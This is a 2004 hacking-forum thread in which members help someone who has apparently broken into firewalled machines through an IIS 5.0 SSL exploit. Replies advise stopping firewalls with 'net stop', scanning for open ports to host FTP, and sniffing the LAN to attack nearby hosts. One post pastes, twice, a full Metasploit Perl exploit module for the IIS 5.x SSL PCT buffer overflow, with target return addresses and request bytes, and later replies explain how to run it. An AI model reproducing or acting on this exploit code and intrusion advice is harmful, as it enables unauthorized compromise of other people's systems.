goddamit.. almost every comp is firewalled and I can't install an FTP..
anyone has any ideas?!
Thanks, tte.
Sponsored by: █ Sparkhost - Hosting Without Compromises! █ Hybrid Performance Web Hosting █ Spark Host Stream Hosting █ Hybrid IRC & IRCd Server Shell Accounts
Iis Ssl 5.0
Started by
Guest_tte_*
, Apr 24 2004 01:55 PM
9 replies to this topic
#2
SeNe
-
- Members
-
- 66 posts
Private First Class
Posted 24 April 2004 - 02:10 PM
the version 0.2 of the exploit seems to be succesfull only on internal lans, so u cant install a ftp there, just sniff the network to try to hack near machines.
#3
kevin007
-
- Members
-
- 51 posts
Private First Class
Posted 25 April 2004 - 05:58 AM
you shouldn't hack (crack) any computers which aren't your own....
however.... if you choose to ignore this well
firstly, you can stop any software firewalls with net stop firewallname
secondly, often a firewall for a webhost will have certain ports open.... well, find that port (a good scanner such as nmap can often detect if a port is blocked rather than just not being used) and set ur ftp there
however.... if you choose to ignore this well
firstly, you can stop any software firewalls with net stop firewallname
secondly, often a firewall for a webhost will have certain ports open.... well, find that port (a good scanner such as nmap can often detect if a port is blocked rather than just not being used) and set ur ftp there
#4
Thom
-
- Members
-
- 308 posts
Staff Sergeant
Posted 25 April 2004 - 06:00 AM
try ports like, 21,22,23,25,80 might be taken but its the best i got to recommend
#5
HanSolo23
-
- Members
-
- 8 posts
Private
Posted 25 April 2004 - 08:36 AM
i can`t start a new topic because of this i add my question here, maybe somebody knows what a language is this code.
it is posted @k-otic but i don`t know what the language of this code is.
can anybody help me ?
package Msf::Exploit::iis5x_ssl_pct;
use base "Msf::Exploit";
use strict;
my $advanced = { };
my $info =
{
'Name' => 'IIS 5.x SSL PCT Overflow',
'Version' => '$Revision: 1.22 $',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com> [Artistic License]',
'Johnny Cyberpunk <jcyberpunk@thc.org> [Unknown License]' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 1,
'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' => {
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 443],
},
'Payload' => {
'MinNops' => 0,
'MaxNops' => 0,
'Space' => 1800,
'BadChars' => '',
},
'Description' => qq{
This module exploits a buffer overflow in the Microsoft Windows PCT
protocol stack. This code is based on Johnny Cyberpunk's THC release
and has been tested against Windows 2000 and Windows XP. This vulnerability
may not affect Windows 2000 SP0 or Windows 2003.
},
'Refs' => [
],
'Targets' => [
#['Windows 2000 SP4/SP3', 0x6741a7c6],
['Windows 2000 SP4', 0x67419ce8],
['Windows 2000 SP3', 0x67419e1d],
['Windows 2000 SP2', 0x6741a426],
['Windows 2000 SP1', 0x6741a199],
['Windows XP SP0', 0x0ffb7de9],
['Windows XP SP1', 0x0ffb832f],
],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
# return address is [esp+0x6c] (dssenh.dll)
# this is a heap ptr to the ssl request
# ... and just happens to not die
# thanks to CORE, Halvar, JohnnyC
#
# 80620101 => and byte ptr [esi+1], 0x2
# bd00010001 => mov ebp, 0x1000100
# 0016 => add [esi], dl
# 8f8201000000 => pop [esi+1]
# eb0f => jmp short 11 to shellcode
my $request =
"\x80\x66\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x86\x01\x00\x00\x00".
"\xeb\x0f".'XXXXXXXXXXX'.pack('V', ($target->[1] ^ 0xffffffff)).
$shellcode;
my $s = Msf::Socket->new({'SSL' => 0});
if (! $s->Tcp($target_host, $target_port))
{
$self->PrintLine("[*] Error: could not connect: " . $s->GetError());
return;
}
$self->PrintLine("[*] Sending " .length($request) . " bytes to remote host.");
$s->Send($request);
$self->PrintLine("[*] Waiting for a response...");
my $r = $s->Recv(-1, 5);
return;
}
it is posted @k-otic but i don`t know what the language of this code is.
can anybody help me ?
package Msf::Exploit::iis5x_ssl_pct;
use base "Msf::Exploit";
use strict;
my $advanced = { };
my $info =
{
'Name' => 'IIS 5.x SSL PCT Overflow',
'Version' => '$Revision: 1.22 $',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com> [Artistic License]',
'Johnny Cyberpunk <jcyberpunk@thc.org> [Unknown License]' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 1,
'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' => {
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 443],
},
'Payload' => {
'MinNops' => 0,
'MaxNops' => 0,
'Space' => 1800,
'BadChars' => '',
},
'Description' => qq{
This module exploits a buffer overflow in the Microsoft Windows PCT
protocol stack. This code is based on Johnny Cyberpunk's THC release
and has been tested against Windows 2000 and Windows XP. This vulnerability
may not affect Windows 2000 SP0 or Windows 2003.
},
'Refs' => [
],
'Targets' => [
#['Windows 2000 SP4/SP3', 0x6741a7c6],
['Windows 2000 SP4', 0x67419ce8],
['Windows 2000 SP3', 0x67419e1d],
['Windows 2000 SP2', 0x6741a426],
['Windows 2000 SP1', 0x6741a199],
['Windows XP SP0', 0x0ffb7de9],
['Windows XP SP1', 0x0ffb832f],
],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
# return address is [esp+0x6c] (dssenh.dll)
# this is a heap ptr to the ssl request
# ... and just happens to not die
# thanks to CORE, Halvar, JohnnyC
#
# 80620101 => and byte ptr [esi+1], 0x2
# bd00010001 => mov ebp, 0x1000100
# 0016 => add [esi], dl
# 8f8201000000 => pop [esi+1]
# eb0f => jmp short 11 to shellcode
my $request =
"\x80\x66\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x86\x01\x00\x00\x00".
"\xeb\x0f".'XXXXXXXXXXX'.pack('V', ($target->[1] ^ 0xffffffff)).
$shellcode;
my $s = Msf::Socket->new({'SSL' => 0});
if (! $s->Tcp($target_host, $target_port))
{
$self->PrintLine("[*] Error: could not connect: " . $s->GetError());
return;
}
$self->PrintLine("[*] Sending " .length($request) . " bytes to remote host.");
$s->Send($request);
$self->PrintLine("[*] Waiting for a response...");
my $r = $s->Recv(-1, 5);
return;
}
#7
strohunter
-
- Members
-
- 208 posts
Sergeant
Posted 25 April 2004 - 09:12 AM
that's PERL, just put the code in a pl file and run the script under a environnemnt with perl installed.
#8 Guest_Qlimax_*
Guest_Qlimax_*
-
- Guests
Posted 25 April 2004 - 09:54 AM
what that perl need to do?that's PERL, just put the code in a pl file and run the script under a environnemnt with perl installed.
#9
HanSolo23
-
- Members
-
- 8 posts
Private
Posted 26 April 2004 - 06:11 AM
i also thougt yesterday that it has to be perl but test it it doesn`t work in a pl file the ending at k-otic was pm but it does`nt work with perl or i am using it false.
i tested per test.pl but nothing apeared
han
i tested per test.pl but nothing apeared
han
#10
Borgon
-
- Members
-
- 15 posts
Private
Posted 26 April 2004 - 06:25 AM
You guys are funny, the perl code above is a module exploit for the metasploit program. You just cant run it like that, you need to save it to the exploit directoy in metasploit and it should detect the new exploit added.
0 user(s) are reading this topic
0 members, 0 guests, 0 anonymous users
